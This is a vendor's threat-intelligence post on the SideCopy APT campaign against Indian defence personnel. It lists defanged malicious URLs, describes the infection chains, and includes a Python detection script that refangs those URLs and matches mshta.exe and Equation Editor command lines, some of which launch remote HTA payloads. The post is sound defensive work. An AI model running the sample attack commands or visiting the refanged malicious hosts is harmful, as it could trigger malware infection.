Operation SideCopy!
23 September 2020

Written by Kalpesh Mantri

APT, Cybersecurity

An insight into Transparent Tribe’s sub-division which has been incorrectly attributed for years.

Introduction

Quick Heal’s threat intelligence team recently uncovered evidence of an advanced persistent threat (APT) against Indian defence forces. Our analysis shows that many older campaigns and attacks from the past year are linked to ‘Operation SideCopy’ through common IOCs.

Key Findings

  • Operation SideCopy has been active from early 2019 to date.
  • This cyber-operation has targeted only Indian defence forces and armed forces personnel.
  • The malware modules seen are under constant development; updated modules are released after reconnaissance of victim data.
  • The actors keep track of malware detections and update modules when they are detected by AV.
  • Almost all C&C servers are hosted with Contabo GmbH, and the server names resemble machine names found in the Transparent Tribe report.
  • This threat actor misleads the security community by copying TTPs that point at the Sidewinder APT group.
  • We suspect this threat actor has links with the Transparent Tribe APT group.

Summary:

A few months ago, Quick Heal’s Next-Gen Behavioural Detection system alerted on a few processes executing HTA files fetched from non-reputable websites.

We compiled a list of the URLs that mshta.exe connected to, across multiple customers:

  • hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Armed-Forces-Spl-Allowance-Order/html/
  • hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Defence-Production-Policy-2020/html/
  • hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Images/8534
  • hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/IncidentReport/html/
  • hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/ParaMil-Forces-Spl-Allowance-Order/html/
  • hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Req-Data/html
  • hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Sheet_Roll/html
  • hxxps://demo[.]smart-school[.]in/uploads/staff_documents/9/Sheet_Roll/html
  • hxxps://demo[.]smart-school[.]in/uploads/student_documents/12/css/
  • hxxps://drivetoshare[.]com/mod[.]gov[.]in_dod_sites_default_files_Revisedrates/html

The highlighted URLs were sent to targets across Indian defence units and to individual armed forces personnel.

We started tracking this campaign because it was targeting critical Indian organizations.

Traces of this operation can be tracked from early 2019 to date. So far, we have observed three infection chains.

The initial infection vector in two of the chains was an LNK file delivered by malspam. In the third, the attackers used a template injection attack together with the Equation Editor vulnerability (CVE-2017-11882) as the initial infection vector. Although the initial vector differs in the third chain, its final payload is similar to that of the first two.

The images below give an overview of the malware infection on victim machines.
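To turn the two telemetry observations above (mshta.exe fetching remote HTA content, and the Equation Editor path of the third chain) into something a SOC can test, here is an added Python example; it is not part of the original post and not Quick Heal's tooling. It refangs the defanged URLs listed above so they can be matched against telemetry, then runs three simple process-creation rules over constructed sample events. The event fields, the benign example domain, the rule names and the list of Office parent processes are assumptions.

```python
import re
from dataclasses import dataclass

# Defanged IOC URLs as listed in the post; refanged below only for matching.
DEFANGED_IOCS = [
    "hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Armed-Forces-Spl-Allowance-Order/html/",
    "hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Defence-Production-Policy-2020/html/",
    "hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Images/8534",
    "hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/IncidentReport/html/",
    "hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/ParaMil-Forces-Spl-Allowance-Order/html/",
    "hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Req-Data/html",
    "hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Sheet_Roll/html",
    "hxxps://demo[.]smart-school[.]in/uploads/staff_documents/9/Sheet_Roll/html",
    "hxxps://demo[.]smart-school[.]in/uploads/student_documents/12/css/",
    "hxxps://drivetoshare[.]com/mod[.]gov[.]in_dod_sites_default_files_Revisedrates/html",
]


def refang(url: str) -> str:
    """Turn hxxp(s)://a[.]b into http(s)://a.b so it compares with real telemetry."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE).replace("[.]", ".")


def host_of(url: str) -> str:
    """Extract the lower-cased host part of an http(s) URL ('' if not a URL)."""
    m = re.match(r"^https?://([^/:]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else ""


# Hosts we treat as known-bad for this campaign (derived from the post's IOC list).
IOC_HOSTS = {host_of(refang(u)) for u in DEFANGED_IOCS}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Assumed set of Office parents worth watching; extend to your environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}


@dataclass
class Event:
    """Minimal process-creation record (field names are an assumption)."""
    parent: str
    image: str
    cmdline: str


# Constructed sample events, not real telemetry. The first and fourth reuse
# URLs from the post; the second uses an invented benign-looking domain.
SAMPLE_EVENTS = [
    Event("explorer.exe", "mshta.exe",
          "mshta.exe https://demo.smart-hospital.in/uploads/staff_documents/19/Req-Data/html"),
    Event("explorer.exe", "mshta.exe", "mshta.exe https://cdn.example-benign.test/page.hta"),
    Event("winword.exe", "eqnedt32.exe", "eqnedt32.exe -Embedding"),
    Event("eqnedt32.exe", "cmd.exe",
          "cmd.exe /c start mshta.exe https://drivetoshare.com/mod.gov.in_dod_sites_default_files_Revisedrates/html"),
    Event("explorer.exe", "notepad.exe", "notepad.exe readme.txt"),
]


def classify(ev: Event) -> list:
    """Return the detection tags that apply to one process-creation event."""
    findings = []
    image, parent = ev.image.lower(), ev.parent.lower()
    hosts = {host_of(u) for u in URL_RE.findall(ev.cmdline)}
    # Rule 1: mshta.exe handed a remote URL (HTA fetched from the web).
    if image == "mshta.exe" and hosts:
        findings.append("mshta-remote-hta")
    # Rule 2: an Office app loading the Equation Editor (precondition for CVE-2017-11882).
    if parent in OFFICE_APPS and image == "eqnedt32.exe":
        findings.append("office-spawns-eqnedt32")
    # Rule 3: the Equation Editor itself spawning a child is the exploitation signature.
    if parent == "eqnedt32.exe":
        findings.append("eqnedt32-spawns-child")
    # Rule 4: any command line that references a campaign IOC host.
    if hosts & IOC_HOSTS:
        findings.append("ioc-host-match")
    return findings


def scan(events) -> list:
    """Run classify() over a batch and keep only events that fired a rule."""
    report = []
    for ev in events:
        tags = classify(ev)
        if tags:
            report.append((ev.image, tags))
    return report


if __name__ == "__main__":
    for image, tags in scan(SAMPLE_EVENTS):
        print(f"{image:14s} {', '.join(tags)}")
```

Rule 3 is the one worth prioritising: a legitimate Equation Editor session has no reason to create child processes, so it is a low-noise signal, while rule 1 will also fire on benign HTA applications and needs the IOC or reputation context of rule 4 to become actionable.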

Infection Chain – Version 1:

[Figure: Infection Chain – Version 1]

Infection Chain – Version 2:

[Figure: Infection Chain – Version 2]

Infection Chain – Version 3:

[Figure: Infection Chain – Version 3]

We have provided an in-depth analysis of each of these modules in our latest report, which can be found here.

The background and analysis in this paper provide the forensic details behind our current thinking on the use of malware in this operation, together with all of the factors that led to our attribution.

Subject matter experts:

Kalpesh Mantri, Principal Security Researcher

Pawan Chaudhari, Threat Research Scientist

Goutam Tripathy, Senior Security Researcher
